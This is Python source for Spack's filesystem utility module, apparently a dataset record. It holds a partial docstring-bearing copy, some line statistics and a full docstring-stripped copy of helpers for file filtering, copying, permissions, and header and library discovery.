if isinstance(headers, six.string_types):
headers = [headers]
elif not isinstance(headers, collections.Sequence):
message = '{0} expects a string or sequence of strings as the '
message += 'first argument [got {1} instead]'
message = message.format(find_headers.__name__, type(headers))
raise TypeError(message)
# Construct the right suffix for the headers
suffixes = [
# C
'h',
# C++
'hpp', 'hxx', 'hh', 'H', 'txx', 'tcc', 'icc',
# Fortran
'mod', 'inc',
]
# List of headers we are searching with suffixes
headers = ['{0}.{1}'.format(header, suffix) for header in headers
for suffix in suffixes]
return HeaderList(find(root, headers, recursive))
def find_all_headers(root):
"""Convenience function that returns the list of all headers found
in the directory passed as argument.
Args:
root (path): directory where to look recursively for header files
Returns:
List of all headers found in ``root`` and subdirectories.
"""
return find_headers('*', root=root, recursive=True)
class LibraryList(FileList):
"""Sequence of absolute paths to libraries
Provides a few convenience methods to manipulate library paths and get
commonly used compiler flags or names
"""
@property
def libraries(self):
"""Stable de-duplication of library files.
Returns:
list of strings: A list of library files
"""
return self.files
@property
def names(self):
"""Stable de-duplication of library names in the list
>>> l = LibraryList(['/dir1/liba.a', '/dir2/libb.a', '/dir3/liba.so'])
>>> l.names
['a', 'b']
Returns:
list of strings: A list of library names
"""
names = []
for x in self.basenames:
name = x
if x.startswith('lib'):
name = x[3:]
# Valid extensions include: ['.dylib', '.so', '.a']
for ext in ['.dylib', '.so', '.a']:
i = name.rfind(ext)
if i != -1:
names.append(name[:i])
break
else:
# No valid extension, should we still include it?
names.append(name)
return list(dedupe(names))
@property
def search_flags(self):
"""Search flags for the libraries
>>> l = LibraryList(['/dir1/liba.a', '/dir2/libb.a', '/dir1/liba.so'])
>>> l.search_flags
'-L/dir1 -L/dir2'
Returns:
str: A joined list of search flags
"""
return ' '.join(['-L' + x for x in self.directories])
@property
def link_flags(self):
"""Link flags for the libraries
>>> l = LibraryList(['/dir1/liba.a', '/dir2/libb.a', '/dir1/liba.so'])
>>> l.link_flags
'-la -lb'
Returns:
str: A joined list of link flags
"""
return ' '.join(['-l' + name for name in self.names])
@property
def ld_flags(self):
"""Search flags + link flags
>>> l = LibraryList(['/dir1/liba.a', '/dir2/libb.a', '/dir1/liba.so'])
>>> l.ld_flags
'-L/dir1 -L/dir2 -la -lb'
Returns:
str: A joined list of search flags and link flags
"""
return self.search_flags + ' ' + self.link_flags
def find_system_libraries(libraries, shared=True):
"""Searches the usual system library locations for ``libraries``.
Search order is as follows:
1. ``/lib64``
2. ``/lib``
3. ``/usr/lib64``
4. ``/usr/lib``
5. ``/usr/local/lib64``
6. ``/usr/local/lib``
Accepts any glob characters accepted by fnmatch:
======= ====================================
Pattern Meaning
======= ====================================
* matches everything
? matches any single character
[seq] matches any character in ``seq``
[!seq] matches any character not in ``seq``
======= ====================================
Parameters:
libraries (str or list of str): Library name(s) to search for
shared (bool, optional): if True searches for shared libraries,
otherwise for static. Defaults to True.
Returns:
LibraryList: The libraries that have been found
"""
if isinstance(libraries, six.string_types):
libraries = [libraries]
elif not isinstance(libraries, collections.Sequence):
message = '{0} expects a string or sequence of strings as the '
message += 'first argument [got {1} instead]'
message = message.format(find_system_libraries.__name__,
type(libraries))
raise TypeError(message)
libraries_found = []
search_locations = [
'/lib64',
'/lib',
'/usr/lib64',
'/usr/lib',
'/usr/local/lib64',
'/usr/local/lib',
]
for library in libraries:
for root in search_locations:
result = find_libraries(library, root, shared, recursive=True)
if result:
libraries_found += result
break
return libraries_found
def find_libraries(libraries, root, shared=True, recursive=False):
"""Returns an iterable of full paths to libraries found in a root dir.
Accepts any glob characters accepted by fnmatch:
======= ====================================
Pattern Meaning
======= ====================================
* matches everything
? matches any single character
[seq] matches any character in ``seq``
[!seq] matches any character not in ``seq``
======= ====================================
Parameters:
libraries (str or list of str): Library name(s) to search for
root (str): The root directory to start searching from
shared (bool, optional): if True searches for shared libraries,
otherwise for static. Defaults to True.
recursive (bool, optional): if False search only root folder,
if True descends top-down from the root. Defaults to False.
Returns:
LibraryList: The libraries that have been found
"""
if isinstance(libraries, six.string_types):
libraries = [libraries]
elif not isinstance(libraries, collections.Sequence):
message = '{0} expects a string or sequence of strings as the '
message += 'first argument [got {1} instead]'
message = message.format(find_libraries.__name__, type(libraries))
raise TypeError(message)
# Construct the right suffix for the library
if shared is True:
suffix = 'dylib' if sys.platform == 'darwin' else 'so'
else:
suffix = 'a'
# List of libraries we are searching with suffixes
libraries = ['{0}.{1}'.format(lib, suffix) for lib in libraries]
if not recursive:
# If not recursive, look for the libraries directly in root
return LibraryList(find(root, libraries, False))
# To speedup the search for external packages configured e.g. in /usr,
# perform first non-recursive search in root/lib then in root/lib64 and
# finally search all of root recursively. The search stops when the first
# match is found.
for subdir in ('lib', 'lib64'):
dirname = join_path(root, subdir)
if not os.path.isdir(dirname):
continue
found_libs = find(dirname, libraries, False)
if found_libs:
break
else:
found_libs = find(root, libraries, True)
return LibraryList(found_libs)
@memoized
def can_access_dir(path):
"""Returns True if the argument is an accessible directory.
Args:
path: path to be tested
Returns:
True if ``path`` is an accessible directory, else False
"""
return os.path.isdir(path) and os.access(path, os.R_OK | os.X_OK)
@memoized
def can_write_to_dir(path):
"""Return True if the argument is a directory in which we can write.
Args:
path: path to be tested
Returns:
True if ``path`` is an writeable directory, else False
"""
return os.path.isdir(path) and os.access(path, os.R_OK | os.X_OK | os.W_OK)
@memoized
def files_in(*search_paths):
"""Returns all the files in paths passed as arguments.
Caller must ensure that each path in ``search_paths`` is a directory.
Args:
*search_paths: directories to be searched
Returns:
List of (file, full_path) tuples with all the files found.
"""
files = []
for d in filter(can_access_dir, search_paths):
files.extend(filter(
lambda x: os.path.isfile(x[1]),
[(f, os.path.join(d, f)) for f in os.listdir(d)]
))
return files
def search_paths_for_executables(*path_hints):
"""Given a list of path hints returns a list of paths where
to search for an executable.
Args:
*path_hints (list of paths): list of paths taken into
consideration for a search
Returns:
A list containing the real path of every existing directory
in `path_hints` and its `bin` subdirectory if it exists.
"""
executable_paths = []
for path in path_hints:
if not os.path.isdir(path):
continue
path = os.path.abspath(path)
executable_paths.append(path)
bin_dir = os.path.join(path, 'bin')
if os.path.isdir(bin_dir):
executable_paths.append(bin_dir)
return executable_paths
def partition_path(path, entry=None):
"""
Split the prefixes of the path at the first occurrence of entry and
return a 3-tuple containing a list of the prefixes before the entry, a
string of the prefix ending with the entry, and a list of the prefixes
after the entry.
If the entry is not a node in the path, the result will be the prefix list
followed by an empty string and an empty list.
"""
paths = prefixes(path)
if entry is not None:
# Derive the index of entry within paths, which will correspond to
# the location of the entry in within the path.
try:
entries = path.split(os.sep)
i = entries.index(entry)
if '' in entries:
i -= 1
return paths[:i], paths[i], paths[i + 1:]
except ValueError:
pass
return paths, '', []
def prefixes(path):
"""
Returns a list containing the path and its ancestors, top-to-bottom.
The list for an absolute path will not include an ``os.sep`` entry.
For example, assuming ``os.sep`` is ``/``, given path ``/ab/cd/efg``
the resulting paths will be, in order: ``/ab``, ``/ab/cd``, and
``/ab/cd/efg``
The list for a relative path starting ``./`` will not include ``.``.
For example, path ``./hi/jkl/mn`` results in a list with the following
paths, in order: ``./hi``, ``./hi/jkl``, and ``./hi/jkl/mn``.
Parameters:
path (str): the string used to derive ancestor paths
Returns:
A list containing ancestor paths in order and ending with the path
"""
if not path:
return []
parts = path.strip(os.sep).split(os.sep)
if path.startswith(os.sep):
parts.insert(0, os.sep)
paths = [os.path.join(*parts[:i + 1]) for i in range(len(parts))]
try:
paths.remove(os.sep)
except ValueError:
pass
try:
paths.remove('.')
except ValueError:
pass
return paths
def md5sum(file):
"""Compute the MD5 sum of a file.
Args:
file (str): file to be checksummed
Returns:
MD5 sum of the file's content
"""
md5 = hashlib.md5()
with open(file, "rb") as f:
md5.update(f.read())
return md5.digest()
def remove_directory_contents(dir):
"""Remove all contents of a directory."""
if os.path.exists(dir):
for entry in [os.path.join(dir, entry) for entry in os.listdir(dir)]:
if os.path.isfile(entry) or os.path.islink(entry):
os.unlink(entry)
else:
shutil.rmtree(entry)
| 31.836616
| 79
| 0.60091
|
import collections
import errno
import hashlib
import glob
import grp
import itertools
import numbers
import os
import pwd
import re
import shutil
import stat
import sys
import tempfile
from contextlib import contextmanager
import six
from llnl.util import tty
from llnl.util.lang import dedupe, memoized
from spack.util.executable import Executable
__all__ = [
'FileFilter',
'FileList',
'HeaderList',
'LibraryList',
'ancestor',
'can_access',
'change_sed_delimiter',
'copy_mode',
'filter_file',
'find',
'find_headers',
'find_all_headers',
'find_libraries',
'find_system_libraries',
'fix_darwin_install_name',
'force_remove',
'force_symlink',
'chgrp',
'chmod_x',
'copy',
'install',
'copy_tree',
'install_tree',
'is_exe',
'join_path',
'mkdirp',
'partition_path',
'prefixes',
'remove_dead_links',
'remove_directory_contents',
'remove_if_dead_link',
'remove_linked_tree',
'set_executable',
'set_install_permissions',
'touch',
'touchp',
'traverse_tree',
'unset_executable_mode',
'working_dir'
]
def path_contains_subdirectory(path, root):
norm_root = os.path.abspath(root).rstrip(os.path.sep) + os.path.sep
norm_path = os.path.abspath(path).rstrip(os.path.sep) + os.path.sep
return norm_path.startswith(norm_root)
def possible_library_filenames(library_names):
lib_extensions = ['a', 'la', 'so', 'tbd', 'dylib']
return set(
'.'.join((lib, extension)) for lib, extension in
itertools.product(library_names, lib_extensions))
def paths_containing_libs(paths, library_names):
required_lib_fnames = possible_library_filenames(library_names)
rpaths_to_include = []
for path in paths:
fnames = set(os.listdir(path))
if fnames & required_lib_fnames:
rpaths_to_include.append(path)
return rpaths_to_include
def same_path(path1, path2):
norm1 = os.path.abspath(path1).rstrip(os.path.sep)
norm2 = os.path.abspath(path2).rstrip(os.path.sep)
return norm1 == norm2
def filter_file(regex, repl, *filenames, **kwargs):
string = kwargs.get('string', False)
backup = kwargs.get('backup', True)
ignore_absent = kwargs.get('ignore_absent', False)
stop_at = kwargs.get('stop_at', None)
if not callable(repl):
unescaped = repl.replace(r'\\', '\\')
def replace_groups_with_groupid(m):
def groupid_to_group(x):
return m.group(int(x.group(1)))
return re.sub(r'\\([1-9])', groupid_to_group, unescaped)
repl = replace_groups_with_groupid
if string:
regex = re.escape(regex)
for filename in filenames:
msg = 'FILTER FILE: {0} [replacing "{1}"]'
tty.debug(msg.format(filename, regex))
backup_filename = filename + "~"
tmp_filename = filename + ".spack~"
if ignore_absent and not os.path.exists(filename):
msg = 'FILTER FILE: file "{0}" not found. Skipping to next file.'
tty.debug(msg.format(filename))
continue
# file in case this file is being filtered multiple times.
if not os.path.exists(backup_filename):
shutil.copy(filename, backup_filename)
# Create a temporary file to read from. We cannot use backup_filename
# in case filter_file is invoked multiple times on the same file.
shutil.copy(filename, tmp_filename)
try:
extra_kwargs = {}
if sys.version_info > (3, 0):
extra_kwargs = {'errors': 'surrogateescape'}
# Open as a text file and filter until the end of the file is
# reached or we found a marker in the line if it was specified
with open(tmp_filename, mode='r', **extra_kwargs) as input_file:
with open(filename, mode='w', **extra_kwargs) as output_file:
# Using iter and readline is a workaround needed not to
# disable input_file.tell(), which will happen if we call
# input_file.next() implicitly via the for loop
for line in iter(input_file.readline, ''):
if stop_at is not None:
current_position = input_file.tell()
if stop_at == line.strip():
output_file.write(line)
break
filtered_line = re.sub(regex, repl, line)
output_file.write(filtered_line)
else:
current_position = None
# If we stopped filtering at some point, reopen the file in
# binary mode and copy verbatim the remaining part
if current_position and stop_at:
with open(tmp_filename, mode='rb') as input_file:
input_file.seek(current_position)
with open(filename, mode='ab') as output_file:
output_file.writelines(input_file.readlines())
except BaseException:
# clean up the original file on failure.
shutil.move(backup_filename, filename)
raise
finally:
os.remove(tmp_filename)
if not backup and os.path.exists(backup_filename):
os.remove(backup_filename)
class FileFilter(object):
def __init__(self, *filenames):
self.filenames = filenames
def filter(self, regex, repl, **kwargs):
return filter_file(regex, repl, *self.filenames, **kwargs)
def change_sed_delimiter(old_delim, new_delim, *filenames):
assert(len(old_delim) == 1)
assert(len(new_delim) == 1)
# TODO: handle these cases one day?
assert(old_delim != '"')
assert(old_delim != "'")
assert(new_delim != '"')
assert(new_delim != "'")
whole_lines = "^s@([^@]*)@(.*)@[gIp]$"
whole_lines = whole_lines.replace('@', old_delim)
single_quoted = r"'s@((?:\\'|[^@'])*)@((?:\\'|[^'])*)@[gIp]?'"
single_quoted = single_quoted.replace('@', old_delim)
double_quoted = r'"s@((?:\\"|[^@"])*)@((?:\\"|[^"])*)@[gIp]?"'
double_quoted = double_quoted.replace('@', old_delim)
repl = r's@\1@\2@g'
repl = repl.replace('@', new_delim)
for f in filenames:
filter_file(whole_lines, repl, f)
filter_file(single_quoted, "'%s'" % repl, f)
filter_file(double_quoted, '"%s"' % repl, f)
def set_install_permissions(path):
# If this points to a file maintained in a Spack prefix, it is assumed that
# this function will be invoked on the target. If the file is outside a
# Spack-maintained prefix, the permissions should not be modified.
if os.path.islink(path):
return
if os.path.isdir(path):
os.chmod(path, 0o755)
else:
os.chmod(path, 0o644)
def group_ids(uid=None):
if uid is None:
uid = os.getuid()
user = pwd.getpwuid(uid).pw_name
return [g.gr_gid for g in grp.getgrall() if user in g.gr_mem]
def chgrp(path, group):
if isinstance(group, six.string_types):
gid = grp.getgrnam(group).gr_gid
else:
gid = group
os.chown(path, -1, gid)
def chmod_x(entry, perms):
mode = os.stat(entry).st_mode
if os.path.isfile(entry):
if not mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH):
perms &= ~stat.S_IXUSR
perms &= ~stat.S_IXGRP
perms &= ~stat.S_IXOTH
os.chmod(entry, perms)
def copy_mode(src, dest):
if os.path.islink(dest):
return
src_mode = os.stat(src).st_mode
dest_mode = os.stat(dest).st_mode
if src_mode & stat.S_IXUSR:
dest_mode |= stat.S_IXUSR
if src_mode & stat.S_IXGRP:
dest_mode |= stat.S_IXGRP
if src_mode & stat.S_IXOTH:
dest_mode |= stat.S_IXOTH
os.chmod(dest, dest_mode)
def unset_executable_mode(path):
mode = os.stat(path).st_mode
mode &= ~stat.S_IXUSR
mode &= ~stat.S_IXGRP
mode &= ~stat.S_IXOTH
os.chmod(path, mode)
def copy(src, dest, _permissions=False):
if _permissions:
tty.debug('Installing {0} to {1}'.format(src, dest))
else:
tty.debug('Copying {0} to {1}'.format(src, dest))
# Expand dest to its eventual full path if it is a directory.
if os.path.isdir(dest):
dest = join_path(dest, os.path.basename(src))
shutil.copy(src, dest)
if _permissions:
set_install_permissions(dest)
copy_mode(src, dest)
def install(src, dest):
copy(src, dest, _permissions=True)
def resolve_link_target_relative_to_the_link(link):
target = os.readlink(link)
if os.path.isabs(target):
return target
link_dir = os.path.dirname(os.path.abspath(link))
return os.path.join(link_dir, target)
def copy_tree(src, dest, symlinks=True, ignore=None, _permissions=False):
if _permissions:
tty.debug('Installing {0} to {1}'.format(src, dest))
else:
tty.debug('Copying {0} to {1}'.format(src, dest))
abs_src = os.path.abspath(src)
if not abs_src.endswith(os.path.sep):
abs_src += os.path.sep
abs_dest = os.path.abspath(dest)
if not abs_dest.endswith(os.path.sep):
abs_dest += os.path.sep
# Stop early to avoid unnecessary recursion if being asked to copy from a
# parent directory.
if abs_dest.startswith(abs_src):
raise ValueError('Cannot copy ancestor directory {0} into {1}'.
format(abs_src, abs_dest))
mkdirp(dest)
for s, d in traverse_tree(abs_src, abs_dest, order='pre',
follow_symlinks=not symlinks,
ignore=ignore,
follow_nonexisting=True):
if os.path.islink(s):
link_target = resolve_link_target_relative_to_the_link(s)
if symlinks:
target = os.readlink(s)
if os.path.isabs(target):
new_target = re.sub(abs_src, abs_dest, target)
if new_target != target:
tty.debug("Redirecting link {0} to {1}"
.format(target, new_target))
target = new_target
os.symlink(target, d)
elif os.path.isdir(link_target):
mkdirp(d)
else:
shutil.copyfile(s, d)
else:
if os.path.isdir(s):
mkdirp(d)
else:
shutil.copy2(s, d)
if _permissions:
set_install_permissions(d)
copy_mode(s, d)
def install_tree(src, dest, symlinks=True, ignore=None):
copy_tree(src, dest, symlinks=symlinks, ignore=ignore, _permissions=True)
def is_exe(path):
return os.path.isfile(path) and os.access(path, os.X_OK)
def get_filetype(path_name):
file = Executable('file')
file.add_default_env('LC_ALL', 'C')
output = file('-b', '-h', '%s' % path_name,
output=str, error=str)
return output.strip()
def chgrp_if_not_world_writable(path, group):
mode = os.stat(path).st_mode
if not mode & stat.S_IWOTH:
chgrp(path, group)
def mkdirp(*paths, **kwargs):
mode = kwargs.get('mode', None)
group = kwargs.get('group', None)
default_perms = kwargs.get('default_perms', 'args')
for path in paths:
if not os.path.exists(path):
try:
# detect missing intermediate folders
intermediate_folders = []
last_parent = ''
intermediate_path = os.path.dirname(path)
while intermediate_path:
if os.path.exists(intermediate_path):
last_parent = intermediate_path
break
intermediate_folders.append(intermediate_path)
intermediate_path = os.path.dirname(intermediate_path)
# create folders
os.makedirs(path)
# leaf folder permissions
if mode is not None:
os.chmod(path, mode)
if group:
chgrp_if_not_world_writable(path, group)
if mode is not None:
os.chmod(path, mode) # reset sticky grp bit post chgrp
# for intermediate folders, change mode just for newly created
# ones and if mode_intermediate has been specified, otherwise
# intermediate folders list is not populated at all and default
# OS mode will be used
if default_perms == 'args':
intermediate_mode = mode
intermediate_group = group
elif default_perms == 'parents':
stat_info = os.stat(last_parent)
intermediate_mode = stat_info.st_mode
intermediate_group = stat_info.st_gid
else:
msg = "Invalid value: '%s'. " % default_perms
msg += "Choose from 'args' or 'parents'."
raise ValueError(msg)
for intermediate_path in reversed(intermediate_folders):
if intermediate_mode is not None:
os.chmod(intermediate_path, intermediate_mode)
if intermediate_group is not None:
chgrp_if_not_world_writable(intermediate_path,
intermediate_group)
os.chmod(intermediate_path,
intermediate_mode) # reset sticky bit after
except OSError as e:
if e.errno != errno.EEXIST or not os.path.isdir(path):
raise e
elif not os.path.isdir(path):
raise OSError(errno.EEXIST, "File already exists", path)
def force_remove(*paths):
for path in paths:
try:
os.remove(path)
except OSError:
pass
@contextmanager
def working_dir(dirname, **kwargs):
if kwargs.get('create', False):
mkdirp(dirname)
orig_dir = os.getcwd()
os.chdir(dirname)
try:
yield
finally:
os.chdir(orig_dir)
@contextmanager
def replace_directory_transaction(directory_name, tmp_root=None):
# Check the input is indeed a directory with absolute path.
# Raise before anything is done to avoid moving the wrong directory
assert os.path.isdir(directory_name), \
'Invalid directory: ' + directory_name
assert os.path.isabs(directory_name), \
'"directory_name" must contain an absolute path: ' + directory_name
directory_basename = os.path.basename(directory_name)
if tmp_root is not None:
assert os.path.isabs(tmp_root)
tmp_dir = tempfile.mkdtemp(dir=tmp_root)
tty.debug('TEMPORARY DIRECTORY CREATED [{0}]'.format(tmp_dir))
shutil.move(src=directory_name, dst=tmp_dir)
tty.debug('DIRECTORY MOVED [src={0}, dest={1}]'.format(
directory_name, tmp_dir
))
try:
yield tmp_dir
except (Exception, KeyboardInterrupt, SystemExit):
# Delete what was there, before copying back the original content
if os.path.exists(directory_name):
shutil.rmtree(directory_name)
shutil.move(
src=os.path.join(tmp_dir, directory_basename),
dst=os.path.dirname(directory_name)
)
tty.debug('DIRECTORY RECOVERED [{0}]'.format(directory_name))
msg = 'the transactional move of "{0}" failed.'
raise RuntimeError(msg.format(directory_name))
else:
# Otherwise delete the temporary directory
shutil.rmtree(tmp_dir)
tty.debug('TEMPORARY DIRECTORY DELETED [{0}]'.format(tmp_dir))
def hash_directory(directory, ignore=[]):
assert os.path.isdir(directory), '"directory" must be a directory!'
md5_hash = hashlib.md5()
# Adapted from https://stackoverflow.com/a/3431835/771663
for root, dirs, files in os.walk(directory):
for name in sorted(files):
filename = os.path.join(root, name)
if filename not in ignore:
# TODO: if caching big files becomes an issue, convert this to
# TODO: read in chunks. Currently it's used only for testing
with open(filename, 'rb') as f:
md5_hash.update(f.read())
return md5_hash.hexdigest()
@contextmanager
def write_tmp_and_move(filename):
dirname = os.path.dirname(filename)
basename = os.path.basename(filename)
tmp = os.path.join(dirname, '.%s.tmp' % basename)
with open(tmp, 'w') as f:
yield f
shutil.move(tmp, filename)
@contextmanager
def open_if_filename(str_or_file, mode='r'):
if isinstance(str_or_file, six.string_types):
with open(str_or_file, mode) as f:
yield f
else:
yield str_or_file
def touch(path):
perms = (os.O_WRONLY | os.O_CREAT | os.O_NONBLOCK | os.O_NOCTTY)
fd = None
try:
fd = os.open(path, perms)
os.utime(path, None)
finally:
if fd is not None:
os.close(fd)
def touchp(path):
mkdirp(os.path.dirname(path))
touch(path)
def force_symlink(src, dest):
try:
os.symlink(src, dest)
except OSError:
os.remove(dest)
os.symlink(src, dest)
def join_path(prefix, *args):
path = str(prefix)
for elt in args:
path = os.path.join(path, str(elt))
return path
def ancestor(dir, n=1):
parent = os.path.abspath(dir)
for i in range(n):
parent = os.path.dirname(parent)
return parent
def get_single_file(directory):
fnames = os.listdir(directory)
if len(fnames) != 1:
raise ValueError("Expected exactly 1 file, got {0}"
.format(str(len(fnames))))
return fnames[0]
@contextmanager
def temp_cwd():
tmp_dir = tempfile.mkdtemp()
try:
with working_dir(tmp_dir):
yield tmp_dir
finally:
shutil.rmtree(tmp_dir)
@contextmanager
def temp_rename(orig_path, temp_path):
same_path = os.path.realpath(orig_path) == os.path.realpath(temp_path)
if not same_path:
shutil.move(orig_path, temp_path)
try:
yield
finally:
if not same_path:
shutil.move(temp_path, orig_path)
def can_access(file_name):
return os.access(file_name, os.R_OK | os.W_OK)
def traverse_tree(source_root, dest_root, rel_path='', **kwargs):
follow_nonexisting = kwargs.get('follow_nonexisting', True)
follow_links = kwargs.get('follow_link', False)
order = kwargs.get('order', 'pre')
if order not in ('pre', 'post'):
raise ValueError("Order must be 'pre' or 'post'.")
ignore = kwargs.get('ignore', None) or (lambda filename: False)
if ignore(rel_path):
return
source_path = os.path.join(source_root, rel_path)
dest_path = os.path.join(dest_root, rel_path)
# preorder yields directories before children
if order == 'pre':
yield (source_path, dest_path)
for f in os.listdir(source_path):
source_child = os.path.join(source_path, f)
dest_child = os.path.join(dest_path, f)
rel_child = os.path.join(rel_path, f)
# Treat as a directory
# TODO: for symlinks, os.path.isdir looks for the link target. If the
# target is relative to the link, then that may not resolve properly
# relative to our cwd - see resolve_link_target_relative_to_the_link
if os.path.isdir(source_child) and (
follow_links or not os.path.islink(source_child)):
# When follow_nonexisting isn't set, don't descend into dirs
# in source that do not exist in dest
if follow_nonexisting or os.path.exists(dest_child):
tuples = traverse_tree(
source_root, dest_root, rel_child, **kwargs)
for t in tuples:
yield t
# Treat as a file.
elif not ignore(os.path.join(rel_path, f)):
yield (source_child, dest_child)
if order == 'post':
yield (source_path, dest_path)
def set_executable(path):
mode = os.stat(path).st_mode
if mode & stat.S_IRUSR:
mode |= stat.S_IXUSR
if mode & stat.S_IRGRP:
mode |= stat.S_IXGRP
if mode & stat.S_IROTH:
mode |= stat.S_IXOTH
os.chmod(path, mode)
def remove_empty_directories(root):
for dirpath, subdirs, files in os.walk(root, topdown=False):
for sd in subdirs:
sdp = os.path.join(dirpath, sd)
try:
os.rmdir(sdp)
except OSError:
pass
def remove_dead_links(root):
for dirpath, subdirs, files in os.walk(root, topdown=False):
for f in files:
path = join_path(dirpath, f)
remove_if_dead_link(path)
def remove_if_dead_link(path):
if os.path.islink(path) and not os.path.exists(path):
os.unlink(path)
def remove_linked_tree(path):
if os.path.exists(path):
if os.path.islink(path):
shutil.rmtree(os.path.realpath(path), True)
os.unlink(path)
else:
shutil.rmtree(path, True)
def fix_darwin_install_name(path):
libs = glob.glob(join_path(path, "*.dylib"))
for lib in libs:
# fix install name first:
install_name_tool = Executable('install_name_tool')
install_name_tool('-id', lib, lib)
otool = Executable('otool')
long_deps = otool('-L', lib, output=str).split('\n')
deps = [dep.partition(' ')[0][1::] for dep in long_deps[2:-1]]
# fix all dependencies:
for dep in deps:
for loc in libs:
# We really want to check for either
# dep == os.path.basename(loc) or
# dep == join_path(builddir, os.path.basename(loc)),
# but we don't know builddir (nor how symbolic links look
if os.path.basename(dep) == os.path.basename(loc):
install_name_tool('-change', dep, loc, lib)
break
def find(root, files, recursive=True):
if isinstance(files, six.string_types):
files = [files]
if recursive:
return _find_recursive(root, files)
else:
return _find_non_recursive(root, files)
def _find_recursive(root, search_files):
found_files = collections.defaultdict(list)
root = os.path.abspath(root)
for path, _, list_files in os.walk(root):
for search_file in search_files:
matches = glob.glob(os.path.join(path, search_file))
matches = [os.path.join(path, x) for x in matches]
found_files[search_file].extend(matches)
answer = []
for search_file in search_files:
answer.extend(found_files[search_file])
return answer
def _find_non_recursive(root, search_files):
found_files = collections.defaultdict(list)
root = os.path.abspath(root)
for search_file in search_files:
matches = glob.glob(os.path.join(root, search_file))
matches = [os.path.join(root, x) for x in matches]
found_files[search_file].extend(matches)
answer = []
for search_file in search_files:
answer.extend(found_files[search_file])
return answer
class FileList(collections.Sequence):
def __init__(self, files):
if isinstance(files, six.string_types):
files = [files]
self.files = list(dedupe(files))
@property
def directories(self):
return list(dedupe(
os.path.dirname(x) for x in self.files if os.path.dirname(x)
))
@property
def basenames(self):
return list(dedupe(os.path.basename(x) for x in self.files))
def __getitem__(self, item):
cls = type(self)
if isinstance(item, numbers.Integral):
return self.files[item]
return cls(self.files[item])
def __add__(self, other):
return self.__class__(dedupe(self.files + list(other)))
def __radd__(self, other):
return self.__add__(other)
def __eq__(self, other):
return self.files == other.files
def __len__(self):
return len(self.files)
def joined(self, separator=' '):
return separator.join(self.files)
def __repr__(self):
return self.__class__.__name__ + '(' + repr(self.files) + ')'
def __str__(self):
return self.joined()
class HeaderList(FileList):
include_regex = re.compile(r'(.*?)(\binclude\b)(.*)')
def __init__(self, files):
super(HeaderList, self).__init__(files)
self._macro_definitions = []
self._directories = None
@property
def directories(self):
values = self._directories
if values is None:
values = self._default_directories()
return list(dedupe(values))
@directories.setter
def directories(self, value):
value = value or []
if isinstance(value, six.string_types):
value = [value]
self._directories = [os.path.normpath(x) for x in value]
def _default_directories(self):
dir_list = super(HeaderList, self).directories
values = []
for d in dir_list:
m = self.include_regex.match(d)
value = os.path.join(*m.group(1, 2)) if m else d
values.append(value)
return values
@property
def headers(self):
return self.files
@property
def names(self):
names = []
for x in self.basenames:
name = x
# Valid extensions include: ['.cuh', '.hpp', '.hh', '.h']
for ext in ['.cuh', '.hpp', '.hh', '.h']:
i = name.rfind(ext)
if i != -1:
names.append(name[:i])
break
else:
# No valid extension, should we still include it?
names.append(name)
return list(dedupe(names))
@property
def include_flags(self):
return ' '.join(['-I' + x for x in self.directories])
@property
def macro_definitions(self):
return ' '.join(self._macro_definitions)
@property
def cpp_flags(self):
cpp_flags = self.include_flags
if self.macro_definitions:
cpp_flags += ' ' + self.macro_definitions
return cpp_flags
def add_macro(self, macro):
self._macro_definitions.append(macro)
def find_headers(headers, root, recursive=False):
if isinstance(headers, six.string_types):
headers = [headers]
elif not isinstance(headers, collections.Sequence):
message = '{0} expects a string or sequence of strings as the '
message += 'first argument [got {1} instead]'
message = message.format(find_headers.__name__, type(headers))
raise TypeError(message)
# Construct the right suffix for the headers
suffixes = [
# C
'h',
# C++
'hpp', 'hxx', 'hh', 'H', 'txx', 'tcc', 'icc',
# Fortran
'mod', 'inc',
]
# List of headers we are searching with suffixes
headers = ['{0}.{1}'.format(header, suffix) for header in headers
for suffix in suffixes]
return HeaderList(find(root, headers, recursive))
def find_all_headers(root):
return find_headers('*', root=root, recursive=True)
class LibraryList(FileList):
@property
def libraries(self):
return self.files
@property
def names(self):
names = []
for x in self.basenames:
name = x
if x.startswith('lib'):
name = x[3:]
# Valid extensions include: ['.dylib', '.so', '.a']
for ext in ['.dylib', '.so', '.a']:
i = name.rfind(ext)
if i != -1:
names.append(name[:i])
break
else:
# No valid extension, should we still include it?
names.append(name)
return list(dedupe(names))
@property
def search_flags(self):
return ' '.join(['-L' + x for x in self.directories])
@property
def link_flags(self):
return ' '.join(['-l' + name for name in self.names])
@property
def ld_flags(self):
return self.search_flags + ' ' + self.link_flags
def find_system_libraries(libraries, shared=True):
if isinstance(libraries, six.string_types):
libraries = [libraries]
elif not isinstance(libraries, collections.Sequence):
message = '{0} expects a string or sequence of strings as the '
message += 'first argument [got {1} instead]'
message = message.format(find_system_libraries.__name__,
type(libraries))
raise TypeError(message)
libraries_found = []
search_locations = [
'/lib64',
'/lib',
'/usr/lib64',
'/usr/lib',
'/usr/local/lib64',
'/usr/local/lib',
]
for library in libraries:
for root in search_locations:
result = find_libraries(library, root, shared, recursive=True)
if result:
libraries_found += result
break
return libraries_found
def find_libraries(libraries, root, shared=True, recursive=False):
if isinstance(libraries, six.string_types):
libraries = [libraries]
elif not isinstance(libraries, collections.Sequence):
message = '{0} expects a string or sequence of strings as the '
message += 'first argument [got {1} instead]'
message = message.format(find_libraries.__name__, type(libraries))
raise TypeError(message)
# Construct the right suffix for the library
if shared is True:
suffix = 'dylib' if sys.platform == 'darwin' else 'so'
else:
suffix = 'a'
# List of libraries we are searching with suffixes
libraries = ['{0}.{1}'.format(lib, suffix) for lib in libraries]
if not recursive:
# If not recursive, look for the libraries directly in root
return LibraryList(find(root, libraries, False))
# To speedup the search for external packages configured e.g. in /usr,
# perform first non-recursive search in root/lib then in root/lib64 and
# finally search all of root recursively. The search stops when the first
# match is found.
for subdir in ('lib', 'lib64'):
dirname = join_path(root, subdir)
if not os.path.isdir(dirname):
continue
found_libs = find(dirname, libraries, False)
if found_libs:
break
else:
found_libs = find(root, libraries, True)
return LibraryList(found_libs)
@memoized
def can_access_dir(path):
return os.path.isdir(path) and os.access(path, os.R_OK | os.X_OK)
@memoized
def can_write_to_dir(path):
return os.path.isdir(path) and os.access(path, os.R_OK | os.X_OK | os.W_OK)
@memoized
def files_in(*search_paths):
files = []
for d in filter(can_access_dir, search_paths):
files.extend(filter(
lambda x: os.path.isfile(x[1]),
[(f, os.path.join(d, f)) for f in os.listdir(d)]
))
return files
